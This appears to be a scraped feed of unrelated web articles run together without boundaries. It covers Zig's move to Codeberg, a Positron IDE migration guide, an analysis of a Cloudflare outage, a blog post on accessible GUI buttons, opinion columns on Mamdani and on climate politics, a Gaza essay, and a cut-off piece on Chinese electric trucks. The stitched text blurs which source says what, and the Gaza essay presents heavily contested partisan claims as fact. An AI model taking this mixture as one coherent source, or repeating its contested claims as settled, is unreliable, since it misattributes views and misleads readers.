The only concern we have in leaving GitHub behind has to do with GitHub Sponsors. This product was key to Zig’s early fundraising success, and it remains a large portion of our revenue today. I can’t thank Devon Zuegel enough. She appeared like an angel from heaven and single-handedly made GitHub into a viable source of income for thousands of developers. Under her leadership, the future of GitHub Sponsors looked bright, but sadly for us, she, too, moved on to bigger and better things. Since she left, that product as well has been neglected and is already starting to decline.
Although GitHub Sponsors is a large fraction of Zig Software Foundation’s donation income, we consider it a liability. We humbly ask that, if you, reader, are currently donating through GitHub Sponsors, you consider moving your recurring donation to Every.org, which is itself a non-profit organization.
As part of this, we are sunsetting the GitHub Sponsors perks. These perks are things like getting your name onto the home page, and getting your name into the release notes, based on how much you donate monthly. We are working with the folks at Every.org so that we can offer the equivalent perks through that platform.
Migration Plan
Effective immediately, I have made ziglang/zig on GitHub read-only, and the canonical origin/master branch of the main Zig project repository is https://codeberg.org/ziglang/zig.git.
Thank you to the Forgejo contributors who helped us with our issues switching to the platform, as well as the Codeberg folks who worked with us on the migration - in particular Earl Warren, Otto, Gusted, and Mathieu Fenniak.
In the end, we opted for a simple strategy, sidestepping GitHub’s aggressive vendor lock-in: leave the existing issues open and unmigrated, but start counting issues at 30000 on Codeberg so that all issue numbers remain unambiguous. Let us please consider the GitHub issues that remain open as metaphorically “copy-on-write”.
Please leave all your existing GitHub issues and pull requests alone. No need to move your stuff over to Codeberg unless you need to make edits, additional comments, or rebase. We’re still going to look at the already open pull requests and issues; don’t worry.
In this modern era of acquisitions, weak antitrust regulations, and platform capitalism leading to extreme concentrations of wealth, non-profits remain a bastion defending what remains of the commons.
Happy hacking,
Andrew
Migrating to Positron, a next-generation data science IDE for Python and R
Since Positron was released from beta, we’ve been working hard to create documentation that could help you, whether you are curious about the IDE or interested in switching. We’ve released two migration guides to help you on your journey, which you can find linked below.
Migrating to Positron from VS Code
Positron is a next-generation IDE for data science, built by Posit PBC. It’s built on Code OSS, the open-source core of Visual Studio Code, which means that many of the features and keyboard shortcuts you’re familiar with are already in place.
However, Positron is specifically designed for data work and includes integrated tools that aren’t available in VS Code by default. These include:
A built-in data explorer: This feature gives you a spreadsheet-style view of your dataframes, making it easy to inspect, sort, and filter data.
An interactive console and variables pane: Positron lets you execute code interactively and view the variables and objects in your session, similar to a traditional data science IDE.
AI assistance: Positron Assistant is a powerful AI tool for data science that can generate and refine code, debug issues, and guide you through exploratory data analysis.
We anticipate many RStudio users will be curious about Positron. When building Positron, we strived to create a familiar interface while adding extensibility and new features, as well as native support for multiple languages. Positron is designed for data scientists and analysts who work with both R and Python and want a flexible, modern, and powerful IDE.
Key features for RStudio users include:
Native multi-language support: Positron is a polyglot IDE, designed from the ground up to support both R and Python seamlessly.
Familiar interface: We designed Positron with a layout similar to RStudio, so you’ll feel right at home with the editor, console, and file panes. We also offer an option to use your familiar RStudio keyboard shortcuts.
Extensibility: Because Positron is built on Code OSS, you can use thousands of extensions from the Open VSX marketplace to customize your IDE and workflow.
Also, check out our migration walkthroughs in Positron itself; find them by searching “Welcome: Open Walkthrough” in the Command Palette (hit the shortcut Cmd + Shift + P to open the Command Palette), or on the Welcome page when you open Positron:
What’s next
We’re committed to making your transition as smooth as possible, and we’ll be continuing to add to these migration guides. Look out for guides for Jupyter users and more!
We’d love to hear from you. What other guides would you like to see? What features would make your transition easier? Join the conversation in our GitHub Discussions.
I was at QCon SF during the recent Cloudflare outage (I was hosting the Stories Behind the Incidents track), so I hadn’t had a real chance to sit down and do a proper read-through of their public writeup and capture my thoughts until now. As always, I recommend you read through the writeup first before you read my take.
All quotes are from the writeup unless indicated otherwise.
Hello saturation, my old friend
The software had a limit on the size of the feature file that was below its doubled size. That caused the software to fail.
One thing I hope readers take away from this blog post is the complex systems failure mode pattern that resilience engineering researchers call saturation. Every complex system out there has limits, no matter how robust that system is. And the systems we deal with have many, many different kinds of limits, some of which you might only learn about once you’ve breached that limit. How well a system is able to perform as it approaches one of its limits is what resilience engineering is all about.
Each module running on our proxy service has a number of limits in place to avoid unbounded memory consumption and to preallocate memory as a performance optimization. In this specific instance, the Bot Management system has a limit on the number of machine learning features that can be used at runtime. Currently that limit is set to 200, well above our current use of ~60 features.
In this particular case, the limit was set explicitly.
thread fl2_worker_thread panicked: called Result::unwrap() on an Err value
As sparse as the panic message is, it does explicitly tell you that the problematic call site was an unwrap call. And this is one of the reasons I’m a fan of explicit limits over implicit limits: you tend to get better error messages than when breaching an implicit limit (e.g., of your language runtime, the operating system, the hardware).
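To make the shape of the failure concrete, here is a generic Rust sketch (this is not Cloudflare’s actual code, just an illustration of the pattern): panicking with unwrap() on a breached limit versus returning an error the caller can degrade on.

```rust
const MAX_FEATURES: usize = 200; // an explicit limit, as in the writeup

#[derive(Debug)]
enum ConfigError {
    TooManyFeatures { got: usize, max: usize },
}

fn load_features(names: Vec<String>) -> Result<Vec<String>, ConfigError> {
    if names.len() > MAX_FEATURES {
        // Surface the breached limit instead of panicking deep inside a worker.
        return Err(ConfigError::TooManyFeatures { got: names.len(), max: MAX_FEATURES });
    }
    Ok(names)
}

fn main() {
    let oversized: Vec<String> = (0..300).map(|i| format!("feature_{i}")).collect();

    // `load_features(oversized.clone()).unwrap()` would panic here, which is
    // roughly the shape of the panic message quoted above.
    match load_features(oversized) {
        Ok(features) => println!("loaded {} features", features.len()),
        Err(e) => eprintln!("rejecting new feature file, keeping previous config: {e:?}"),
    }
}
```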
A subsystem designed to protect surprisingly inflicts harm
Identify and mitigate automated traffic to protect your domain from bad bots. – Cloudflare Docs
The problematic behavior was in the Cloudflare Bot Management system. Specifically, it was in the bot scoring functionality, which estimates the likelihood that a request came from a bot rather than a human.
This is a system that is designed to help protect their customers from malicious bots, and yet it ended up hurting their customers in this case rather than helping them.
As I’ve mentioned previously, once your system achieves a certain level of reliability, it’s the protective subsystems that end up being the things that bite you! These subsystems are a net positive: they help much more than they hurt. But they also add complexity, and complexity introduces new, confusing failure modes into the system.
The Cloudflare case is a more interesting one than the typical instances of this behavior I’ve seen, because Cloudflare’s whole business model is to offer different kinds of protection, as products for their customers. It’s protection-as-a-service, not an internal system for self-protection. But even though their customers are purchasing this from a vendor rather than building it in-house, it’s still an auxiliary system intended to improve reliability and security.
Confusion in the moment
What impressed me the most about this writeup is that they documented some aspects of what it was like responding to this incident: what they were seeing, and how they tried to make sense of it.
In the internal incident chat room, we were concerned that this might be the continuation of the recent spate of high volume Aisuru DDoS attacks:
Man, if I had a nickel for every time I saw someone Slack “Is it DDOS?” in response to a surprising surge of errors returned by the system, I could probably retire at this point.
The spike, and subsequent fluctuations, show our system failing due to loading the incorrect feature file. What’s notable is that our system would then recover for a period. This was very unusual behavior for an internal error.
We humans are excellent at recognizing patterns based on our experience, and that generally serves us well during incidents. Someone who is really good at operations can frequently diagnose the problem very quickly just by, say, the shape of a particular graph on a dashboard, or by seeing a specific symptom and recalling similar failures that happened recently.
However, sometimes we encounter a failure mode that we haven’t seen before, which means that we don’t recognize the signals. Or we might have seen a cluster of problems recently that followed a certain pattern, and assume that the latest one looks like the last one. And these are the hard ones.
This fluctuation made it unclear what was happening as the entire system would recover and then fail again as sometimes good, sometimes bad configuration files were distributed to our network. Initially, this led us to believe this might be caused by an attack.
This incident was one of those hard ones: the symptoms were confusing. The “problem went away, then came back, then went away again, then came back again” type of unstable incident behavior is generally much harder to diagnose than one where the symptoms are stable.
Throwing us off and making us believe this might have been an attack was another apparent symptom we observed: Cloudflare’s status page went down. The status page is hosted completely off Cloudflare’s infrastructure with no dependencies on Cloudflare. While it turned out to be a coincidence, it led some of the team diagnosing the issue to believe that an attacker may be targeting both our systems as well as our status page.
Here they got bit by a co-incident, an unrelated failure of their status page that led them to believe (reasonably!) that the problem must have been external.
I’m still curious as to what happened with their status page. The error message they were getting mentions CloudFront, so I assume they were hosting their status page on AWS. But their writeup doesn’t go into any additional detail on what the status page failure mode was.
But the general takeaway here is that even the most experienced operators are going to take longer to deal with a complex, novel failure mode, precisely because it is complex and novel! As the resilience engineering folks say, prepare to be surprised! (Because I promise, it’s going to happen.)
A plea: assume local rationality
The writeup included a screenshot of the code that had an unhandled error. Unfortunately, there’s nothing in the writeup that tells us what the programmer was thinking when they wrote that code.
In the absence of any additional information, a natural human reaction is to just assume that the programmer was sloppy. But if you want to actually understand how these sorts of incidents actually happen, you have to fight this reaction.
People always make decisions that make sense to them in the moment, based on what they know and what constraints they are operating under. After all, if that wasn’t true, then they wouldn’t have made that decision. The only way we can actually understand the conditions that enable incidents is to try as hard as we can to put ourselves into the shoes of the person who made that call, to understand what their frame of mind was at the moment.
If we don’t do that, we risk the problem of distancing through differencing. We say, “oh, those devs were bozos, I would never have made that kind of mistake”. This is a great way to limit how much you can learn from an incident.
Detailed public writeups as evidence of good engineering
The writeup produced by Cloudflare (signed by the CEO, no less!) was impressively detailed. It even includes a screenshot of a snippet of code that contributed to the incident! I can’t recall ever reading another public writeup with that level of detail.
Companies generally err on the side of saying less rather than more. After all, if you provide more detail, you open yourself up to criticism that the failure was due to poor engineering. The fewer details you provide, the fewer things people can call you out on. It’s not hard to find people online criticizing Cloudflare using the details they provided as the basis for their criticism.
Now, I think it would advance our industry if people held the opposite view: the more details that are provided in an incident writeup, the higher esteem we should hold that organization in. I respect Cloudflare as an engineering organization a lot more precisely because they are willing to provide these sorts of details. I don’t want to hear what Cloudflare should have done from people who weren’t there; I want to see us hold other companies up to Cloudflare’s standard for describing the details of a failure mode and the inherently confusing nature of incident response.
Pocketbase – open-source realtime back end in 1 file
I appreciate that someone else understands that being a GUI has some basic requirements and “draws to the screen” is not the interesting one. The bar is about 20cm off the floor but everyone forgets to jump.
Despite mostly not working on GUIs in my career, I have strong opinions about consistency and about affordances for beginners and power users alike. So today, let’s take a simple case study: a button.
No one really agrees these days on what a button should look like, but we can figure that out later. For now, we can take an icon and draw a border around it and that probably counts:
A disclaimer: we’ll be working in HTML and CSS, and you can view the page source to see how I did each of the examples, but I’m not trying to make the best HTML or CSS here. Instead, I’m trying to demonstrate how someone might try to build a UI element from scratch, in or out of a browser. (It’s up to you to judge how successful I am.)
Buttons are specifically UI elements that do things, so let’s add an action when you click it:
Perfect! We’re basically done, right?
(Note to voice control users: for this article I have specifically hidden the first several examples from readers/tools so you don’t have to wade through iterations of the same boring thing. It’s just bringing up a dialog. Unfortunately, when we get to the point of talking about focused elements you’ll start hearing some incomplete descriptions.)
There are lots of ways to submit an action
If you’re reading this on a phone, you probably noticed the first wrong thing: I made it work if you click the button with a cursor, but not if you tap it with a finger. Let’s fix that:
Are we done? Well, no. Users sometimes misclick, and so OSs back to System 1.0 for the Mac (possibly even earlier) have a feature called drag cancellation or pointer cancellation, where if you drag away from the button before letting go of the click/tap, it doesn’t fire. This behavior can’t be provided with only one of “mouse down on my UI element” and “mouse up on my UI element”; you need both, or some higher-level operation. [1]
[1] To be fair I had to go a little out of my way to do this section, for demonstration purposes. Modern web browsers pack up everything we’ve been talking about in a single “click” event that handles both clicks and taps as well as drag-cancellation. But if you’re trying to make a button from scratch outside of a web browser, you might have made this mistake.
Keyboard navigation
Some people don’t use a mouse—whether to keep their hands efficiently on the keyboard, or because they don’t have the manual dexterity to use pointing devices, or both, or some other reason. To facilitate this, desktop OSs let you tab between all the interactable items in a window—not just form fields, but everything you might need to interact with. (These days it’s often tucked away in a setting called “Full keyboard access” or something, but sometimes even without hunting for that you might be able to get it to work with Option-Tab or Ctrl-Tab. Adding Shift goes backwards.) Our button should support this.
We also didn’t say anywhere to draw a ring when focused (in fact, maybe your web browser doesn’t, but mine does). Let’s fix that by adding some explicit style information:
Even here we’re still relying on the web browser to track this “focused” state for us; ultimately someone has to know what UI element is focused, and which the “next” and “previous” elements should be.
While we’re here, let’s fix one more display issue from the previous section: buttons should show some feedback when you start to press them, to go with the drag-cancellation feature and also so you can tell that the click happened at all. We’re again going to lean on the web browser for this active or highlighted state, but it really does make the experience much better.
Voice control
Some people don’t use a mouse or keyboard to control their computers. Instead, they use voice recognition programs that can translate commands into UI actions. For yet another time, the web browser assists us here: if you can manage to select one of the “focusable” buttons above, you can activate it.
However, voice control is often paired with screen reading: a navigation aid for people who can’t use a display (usually because of visual impairment, but I have on a handful of occasions used it to work with a computer I had no monitor for). There are a number of ways interactable UI elements show up there, but in this case let’s just see what happens when the user focuses the button (using keyboard navigation, or a scroll wheel, or something):
Oh dear. We used an icon with no
alt text
, so the user has no idea what this button does. This is more about
images
than about
buttons
specifically, but even with a text button you may still want your screen-reader label / “accessibility label” to be different from the displayed text, since the user may not have the same contextual information when they navigate to it.
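For the hand-rolled sketch, the fix is to give the element a role and an accessible name; the label text below is hypothetical, standing in for whatever the icon actually means:

```ts
const fakeButton = document.querySelector<HTMLDivElement>(".fake-button")!;

// Tell assistive technology what this thing is and what it's called.
fakeButton.setAttribute("role", "button");
fakeButton.setAttribute("aria-label", "New document"); // hypothetical label
```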
Okay, fixed. Ish. Again, web browsers are helping out a lot here; every OS has a different accessibility interface, and every GUI toolkit has to plug into it. Or not, and frustrate users.
Key Equivalents
We’re finally approaching something that behaves like a button from 1990. It’s still not very pretty, but most of the changes we’ve been making have been to things other than appearance. Here’s one more: did you know many buttons on your system have keyboard shortcuts, just like menu items? On Windows these are usually Alt-something; on a Mac they’re Cmd-something like menu items. (Most of the time this only matters for dialog boxes; the rest of the time most buttons have equivalent menu items anyway.)
This is less common in web pages. It’s not even that common in general, beyond standard shortcuts of Return for default actions, Escape for Cancel, and maybe Cmd-Delete for “confirm remove”. But we’ll add it here anyway: if you’re a power user, this button can now be pressed with Ctrl-B, or perhaps Ctrl-Option-B, or maybe Alt-Shift-B, or… (
It depends on your browser and OS
, and the chart doesn’t even seem to be up to date.)
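That behavior matches the web’s accesskey attribute, which is presumably what’s at work here; as a sketch, with the letter chosen arbitrarily:

```ts
const fakeButton = document.querySelector<HTMLDivElement>(".fake-button")!;

// The browser and OS decide the modifier combination (Alt-, Ctrl-Option-,
// Alt-Shift-, ...); we only get to pick the letter.
fakeButton.setAttribute("accesskey", "b");
```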
Consistency
Even with all this, we
still
don’t have something that behaves like a normal button. It doesn’t “highlight” when pressing Space, because I didn’t explicitly write code for it. VoiceOver, the macOS screenreader, calls it a “group” or “image” rather than a button. It doesn’t support a “disabled” state.
It turns out this has been the wrong approach from the start, at least for an application or web page. We don’t need to do any of this. We can start with a system-provided button:
And then customize it to do our own drawing.
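On the web, that might look like the sketch below: a real <button> with the custom appearance layered on top (the class name and label are again hypothetical), so the platform supplies everything we spent the rest of the post rebuilding:

```ts
// Start from the system-provided control and restyle it.
const realButton = document.createElement("button");
realButton.type = "button";                  // not a form-submit button
realButton.className = "fancy-button";       // custom drawing lives in CSS
realButton.textContent = "📄";               // still icon-only...
realButton.setAttribute("aria-label", "New document"); // ...so keep a label

realButton.addEventListener("click", () => {
  // The high-level click event: mouse, touch, keyboard, voice control,
  // and drag cancellation all come along for free.
  alert("You clicked the button!");
});

document.body.append(realButton);
```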
It’s still a chunk of the work we had before, but
now
we and the web browser agree that it’s a button, and we get most of what we discussed for free. As well as anything else I forgot in making this blog post.
Conclusion
All that for a button. Lists, sliders, and tables are more complicated, and text editing is so complicated that even a number of apps that otherwise roll their own UI (usually games) still use the system text input.
The general moral here is that we, as an industry, have had
40 years
to establish what desktop GUIs are like, over 30 to establish what web pages are like, and nearly 20 to establish what mobile GUIs are like. Not every tradition is good, but if you’re a sighted mouse-user, you might not even know what you’re omitting when you diverge from conventions. Which translates to people being frustrated with your app or web page, or in the worst case not being able to use it at all.
If you’re an app developer, the lesson is simple: if you want to customize a UI element, start with a standard one and change how it draws, rather than building one up from scratch and trying to match the system in every little way. If you are a GUI library author, things might be trickier. You’re
trying
to rebuild things, and there’s a good chance you
do
know more than me about GUIs. But please at least consider if it’s going to work with a screenreader.
P.S. Let this not discourage
exploration,
taking apart existing UI elements and building new ones to see how they work. I just want people to stop thinking “works for me” is good enough.
To Win Radical Success, Mamdani Understands, Is To Know When and Where To Compromise
New York City Mayor-elect Zohran Mamdani and New York City Police Commissioner Jessica Tisch shake hands after their visit to the New York City Police Memorial, November 19, 2025. | Credit: Richard Drew/AP Photo // The American Prospect
Mamdani’s ultra-disciplined campaign focused on a handful of policies that New Yorkers both needed and wanted: affordable housing and universal child care above all, along with free buses and a handful of city-owned grocery stores. Like Bernie Sanders and Alexandria Ocasio-Cortez, Mamdani is a democratic socialist, but also like them, his agenda is garden-variety social democratic. To win its enactment—in a word, to deliver—requires a host of accommodations with a political establishment that is not all that social democratic itself. The price for delivering on his core issues is compromise on other issues. And like all successful principled political leaders, Mamdani gets that in his bones.
Part of getting that means he must avoid making political enemies when doing so would imperil his agenda. Back in July, when I
wrote
that Democratic primary victor Mamdani would likely start picking up endorsements from establishment Democrats, I noted that he needed a progressive challenge to House Democratic leader and Brooklyn Rep. Hakeem Jeffries like the proverbial hole in the head. In time, Jeffries did endorse Mamdani, and today, Mamdani has made clear that he does not back progressive Democrat Chi Ossé’s challenge to Jeffries in next year’s congressional primary and has even persuaded the New York chapter of DSA not to endorse him. Opposing Jeffries after Jeffries had endorsed him (however half-heartedly) would upset Jeffries ally Gov. Kathy Hochul, whose support Mamdani needs to fund and create universal child care.
Nor does Mamdani need to further estrange New York’s police, even though his previous critiques of the force are no less true than when he levied them. A disconsolate or even rebellious force can undo a mayoralty or even a city, and New York’s patrol-officer union made clear during Bill de Blasio’s term in office that it was more than willing to lie down on the job at the slightest sign of what it interpreted as disrespect. Mamdani’s reappointment of Police Commissioner Jessica Tisch was a sign that he’d try to avoid inflaming the easily flammable police. Creating an uncomfortable civic peace on that one front gives him the space to focus on child care and housing.
So far, New York DSA appears to understand that such compromises are the price of social democratic power. Their refusal to endorse Ossé indicates that they know the stakes for municipal socialism depend on Mamdani’s success in delivering on his agenda, and
not
on his adhering to any form of doctrinal socialist purity (never mind that DSA has never fully agreed on what socialist purity constitutes). This realpolitik in the ranks is increasingly characteristic of DSA locals in most large cities, where DSA candidates have won electoral office only with broad liberal support and govern in informal coalition with non-DSA progressives. In many smaller locals, where DSA candidates remain on the electoral outs and have failed to form alliances with the broader left (often, where the broad left itself is too weak to win elections), a more sectarian outlook often prevails, and is overrepresented on what passes for the organization’s national political committee.
Since Mamdani’s election, New York DSA has continued to grow and may soon reach a new high of 15,000 members. That said, Mamdani’s campaign mobilized roughly 100,000 volunteers, an astonishing achievement that means his base overwhelmingly does not consist of DSA members, and that he’s answerable, even in the most narrow definition of “answerability,” to a much broader group than DSA. Just as Mamdani must govern within a broad left coalition, so New York DSA must—or at least, should—understand that its fortunes and capacities are maximized only when it acts within a broad left coalition, too. So far, that appears to be the case.
Maintaining the unity and clout of that coalition will be required if the Mamdani agenda is to be realized. The city lost its fiscal independence—the ability, say, to levy its own taxes—during the near-bankruptcy of the 1970s, when it ceded that power to the state. If Mamdani’s legions stay mobilized in support of the higher taxes on Gotham’s gazillionaires that are required to fund universal child care, they can certainly compel the state legislature to enact them. And if they can stay mobilized to swell Hochul’s vote in her upcoming re-election contest, they can likely persuade her to sign that bill. It’s not as if a 2 percent tax hike on New York’s richest is unpopular with anyone other than New York’s richest.
Even without New York’s one-off dependence on Albany, a progressive city can’t be an island, entire of itself, if it’s to be successful. Mamdani rightly judges Fiorello La Guardia to have been the city’s greatest mayor, but La Guardia’s success in building a social democratic New York was in no small part due to his relationship with Franklin Roosevelt, who made sure that abundant federal aid flowed to the city. (On federal employment programs like the WPA, the feds established a direct liaison office with each of the 48 states—and with one city, New York, which it treated like a state of its own.) The best Mamdani can hope for from our current, sub-ideological president is that he doesn’t clog the city with his deportation goons, but that’s a relationship Mamdani needs to continue working on as well. Radical reform can sometimes require radical pragmatism.
We’ve seen such concessions before. In 1589, Henry of Navarre inherited the French throne, but he was a Protestant in a majority-Catholic country, and parts of that country—most particularly, its capital and largest city—refused to recognize his rule so long as he was a Protestant. Henry had an ambitious agenda of domestic development and (largely anti-Hapsburg) foreign alliances, but his religious affiliation stood in the way of his rallying the nation to the causes (none of them religious) that he deeply believed in.
So he converted to Catholicism, with the famous, if likely apocryphal, words: “Paris is worth a mass.”
New York, Mamdani most surely understands, is worth a Tisch.
Virginia Gov.-elect Abigail Spanberger speaks at a campaign event in Annandale, Virginia, on October 30. | Photo by Jared Serre / FFX Now
Over the last several months, reports from billionaire-funded centrist advocacy groups, like
WelcomePAC
and
Searchlight Institute
, have insisted that Democrats stop talking about climate change—either in their campaigns or while governing. Climate change has little resonance for voters, they claim,
comparing
the polling on reliably unpopular policies like “create a carbon tax” with reliably popular policies like “lower the gas tax.”
Unfortunately, this message appears to be reaching its intended audience. In just the last week, New York Governor
Kathy Hochul
approved a new gas pipeline that President Donald Trump has been championing, while Pennsylvania Governor
Josh Shapiro
dropped his state’s effort to join the Regional Greenhouse Gas Initiative.
The idea that Democrats should abandon the most existential fight human civilization has ever faced is a particularly bizarre lesson to draw following Democrats’ huge wins this November, when many of the party’s victorious candidates explicitly
championed
clean energy investments and accountability for fossil fuel company profiteering as solutions to rising energy costs.
A
memo
published Wednesday by Data for Progress and Fossil Free Media therefore makes the exact opposite argument: Democrats shouldn’t run from climate. Instead, they should translate both the impact of climate change and the benefits of climate action for voters. The new memo, which I participated in drafting, points to evidence showing that, contrary to WelcomePAC’s and Searchlight’s portrayal of climate change as a niche social issue, climate-related costs already are top-of-mind, pocketbook concerns for most Americans.
A
majority of voters
say they believe climate change will have a direct financial impact on their families. Millions of voters are already feeling the pain of skyrocketing home insurance rates, which are driven by the increased risk of severe weather from climate change. Millions more are confronted each year with the staggering costs of disaster recovery from extreme weather events exacerbated by the climate crisis. And a
strong majority
of Americans are struggling with rising electricity prices, a problem that just 5 percent of voters blame on renewables versus corporate profits (38 percent), data centers (14 percent), and grid pressures from extreme weather (11 percent). On the flip side, expanding clean energy is the fastest way to produce cheap electricity needed to lower utility rates—and Democrats hold a massive trust advantage over Republicans when it comes to clean power.
This trust gap is a key part of the argument that Data for Progress and Fossil Free Media are making. Their memo points to findings that, right now, neither party has a significant trust advantage on “electric utility bills” (D+1) or “the cost of living” (R+1). But Democrats do have major trust advantages on “climate change” (D+14) and “renewable energy development” (D+6). By articulating how their climate and clean energy agenda can address these bread-and-butter concerns, Democrats can leverage their advantage on climate to win voters’ trust on what will likely be the most significant issues in 2026 and 2028.
The formula for doing this is pretty simple: First, explain why bills are rising and who’s to blame (utilities, fossil fuel volatility, data-center demand, climate disasters); second, commit to implementing visible cost relief (rate freezes, clean energy buildout); and third, name who will pay (polluters and profiteers, not regular people). Or, to simplify all this into one clear campaign-ready sentence: “We’ll take on rising electricity bills by building the cheapest power and stopping monopoly price-gouging, all while making polluters, not families, pay their fair share.”
The best part about this populist approach to climate is how obviously it contrasts with Trump and the Republicans. Imagine being able to tout this contrast in every stump speech in 2026: Democrats are trying to expand cheap, clean energy to secure lower rates, while Trump is trying to keep
outdated coal plants
running, forcing ratepayers to shoulder billions in extra costs. Democrats are getting tough on price-gouging utilities, while Republicans are giving these corporations free rein. Democrats are fighting to make polluters pay for increasingly costly climate disasters; Republicans want all of us to pay for the damage Big Oil caused.
Abandoning the climate fight would be a profoundly morally reprehensible course of action. (It’s a particularly unforgivable message when it comes from billionaires like Reid Hoffman, who are
funding
the groups telling Democrats to forget about climate while building their own luxury bunkers for “
apocalypse insurance
.”) It’s also a huge political mistake. To give up on climate, an issue that Democrats are trusted on, is to throw away a tool that Democrats can use to offer credible solutions to the cost-of-living crises affecting working people throughout the country.
“Heading into 2026,” the memo reads, “Democrats have a chance to define themselves as the party that will build the cheapest energy, crack down on profiteering, and make polluters, not families, pay for the climate damage they’ve caused.” That is, substantively, a great climate agenda. It’s also a winning electoral message, and one Democrats should be running on, not from.
Aaron Regunberg
is a contributing editor at The New Republic, a climate lawyer, and a progressive organizer.
At the time of writing, there is a ceasefire in effect in Gaza, although it is one-sided, because as usual in such cases, Israel continues occasionally to bomb the Strip. The experience of previous such ceasefires does not inspire confidence that this one will hold for long. Still, it may be useful to reflect on the situation as it currently exists and pose the question: if this were the end, which side won? One way of determining that is to look at the war aims of each of the two parties and see which were realised and which were not. If one side attained the most important of their aims, it ‘won’; if it did not, it ‘lost’.
There are, of course, tremendous differences in the resources and capacities of the two sides: Israel has a large and carefully trained military with a virtually unlimited supply of the most modern, high-tech weapons in the world, including fighter jets, tanks and helicopters, whereas the Palestinian side is a coalition of militias comprising a few fighters equipped with small arms, home-made rockets and some improvised devices (mostly constructed, it seems, from salvaged, unexploded Israeli ordnance). This means that the possible aims which the two sides could envisage are also systematically different.
The Israelis did succeed in causing massive destruction, but they attained none of their official (or semi-official) war aims. They did not exterminate the population in Gaza or drive it from the Strip, despite two years of total war; they did not defeat, disarm and disband Hamas, and they did not retrieve their hostages by direct military means – virtually all were recovered through negotiation with Hamas, although negotiation was the last thing Israel said it wanted.
If the Israelis lost, does that mean that the Palestinians won? A case could be made for this. After all, the stated aim of Hamas was to acquire the means to engage in an exchange of prisoners. The Israelis hold thousands of Palestinian prisoners, including many children, and many detained long-term without charge. Since under international law Israel is illegally occupying East Jerusalem, the West Bank and Gaza and an occupied population has a right to armed resistance against the occupying power, taking Israeli military personnel prisoner is in principle perfectly legal. Since Israeli governments have in the past been willing to exchange prisoners, acquiring some Israeli military prisoners could have seemed a good way to free detained Palestinians. That turned out to be a correct calculation, in that a mutually agreed exchange of prisoners did eventually take place.
Moreover, it is perhaps not fanciful to discern an ulterior aim, namely, to put Israel in a position in which it dropped its mask of being a liberal, rational society, and revealed its true nature as a lawless and bloodthirsty predator. If indeed Hamas had that as one of its goals on 7 October, they seem to have attained it beyond what anyone could have imagined. No one who watched the gleefully live-streamed genocide which the IDF was carrying out could ever think about the State of Israel, or Zionism, in the same way again. Once the mask fell, it became hard to unsee Zionism’s true face. The events in Gaza have transformed, perhaps permanently, not just attitudes toward the current government in Israel and Israeli society as a whole – which has overwhelmingly and enthusiastically supported the genocide – but also the way people think about the whole history of Zionist settlement in Palestine.
Seeing the destruction in Gaza play out in real time has, in other words, irrevocably changed the commonly accepted view of Israel’s past. Fewer and fewer people now think of this as a desperate attempt to construct a safe refuge for a persecuted group; increasingly it is viewed as just another instance of the old European colonialist story, that is, like the British settlements in Ireland, Australia and North America, French Algeria, apartheid South Africa, and so on. This idea of Israel as a settler-colonial state has been around since the beginning of Zionism, many of whose early leaders described their project in these terms. It got a momentary boost in the West when the distinguished scholar Maxime Rodinson published his essay ‘Israel, fait colonial’ in
Les Temps Modernes
in 1967, but it remained a niche view until the horrors in Gaza became too blatant to ignore. Now it is mainstream, and it will not easily be dislodged.
Was Hamas’s action on 7 October an unmitigated ‘success’? That seems hard to accept because of the immense price that was paid: 70,000 documented civilian deaths (including over 20,000 children) with many still buried under the ruins, an artificially induced famine, untold deaths from long-term, but direct, effects of the war, thousands of child amputees (many of whose limbs had to be amputated without anaesthetic because Israel blocked medical supplies), hospitals, schools and civilian infrastructure bombed to rubble.
That the cost of ‘success’ may be too great to bear was noted by King Pyrrhus of Epirus in 279 BC, when he remarked about the Battle of Asculum: ‘One more victory like that, and we’re done for.’ Was the price for 7 October worth paying? Any attempt to answer this would have to consider various things, including what the alternative was. Was the status quo pre-7 October (a decade-long siege of Gaza by Israel) tolerable in the long run? Who is to say? If the majority of Palestinians think what they have had to suffer was worth it, is it for observers from afar to contradict them? If what is at issue is a general evaluation of the events of 7 October and their consequences, presumably Israelis, too, may claim to have a voice in discussing this. To ‘have a voice’ does not of course mean to be able to dictate the terms of discussion or to have any kind of veto. And we should not expect unanimity.
Losing control of the narrative of a conflict is not the worst thing that can happen to a group, just as simple military defeat is arguably not the worst possible outcome of a war. In the American Civil War, the Unionist forces of the North triumphed and it is their version of events that we now read, but though the American South was devastated and the political structure of the Confederacy dismantled, the population continued to exist and there are plenty of accounts of the war from a pro-Confederacy perspective. The fate of the ancient city of Carthage is grimmer in both respects: it was not just defeated but obliterated by the Romans at the end of the Third Punic War. In addition, we have no idea how the Carthaginians viewed the war because all Carthaginian accounts disappeared completely. Until the advent of modern archaeology all we knew about Carthage, its people and their beliefs was what we were told by their enemies, the Greeks and Romans.
Many Israelis do not merely wish to expel or exterminate the Palestinians, they wish to convince people that they never existed at all. It is a simple fact, however, that ample documentation of the atrocities in Gaza now exists in the public domain. The Palestinian cause has come to resemble opposition to the war in Vietnam or to apartheid in South Africa, something which has been taken up all over the world, by many people who are not directly involved and by many more than the usual suspects; this is to a large extent the result of Israel’s own actions. The efforts of Israel and its Western allies to control the narrative have been more or less completely ineffectual. The future is unknown, but we can be reasonably sure that whoever eventually writes the history, the Israeli wish to expunge the very name ‘Palestinian’ from the record will not be fulfilled.
[This is
Sidecar
, the NLR blog. Launching in December 2020, Sidecar aims to provide a space on the left for international interventions and debate. A buzzing and richly populated left-media landscape has emerged online in the past decade, but its main English-speaking forms have been largely monoglot in outlook and national in focus, treating culture as a subsidiary concern. By contrast, political writing on Sidecar will take the world, rather than the Anglosphere, as its primary frame. Culture in the widest sense – arts, ideas, mores – will have full standing. Translation of, and intellectual engagement with, interventions in languages other than English will be integral to its work. And while New Left Review appears bi-monthly, running articles of widely varied length, Sidecar will post several items a week, each no longer than 2,500 words and many a good deal shorter.]
Cheap Chinese battery electric heavy trucks are no longer a rumor. They are real machines with real price tags that are so low that they force a reassessment of what the global freight industry is willing to pay for electrification. Standing in a commercial vehicle hall in Wuhan and seeing a 400 kWh or 600 kWh truck priced between €58,000 and €85,000, as my European freight trucking electrification contact
Johnny Nijenhuis recently did
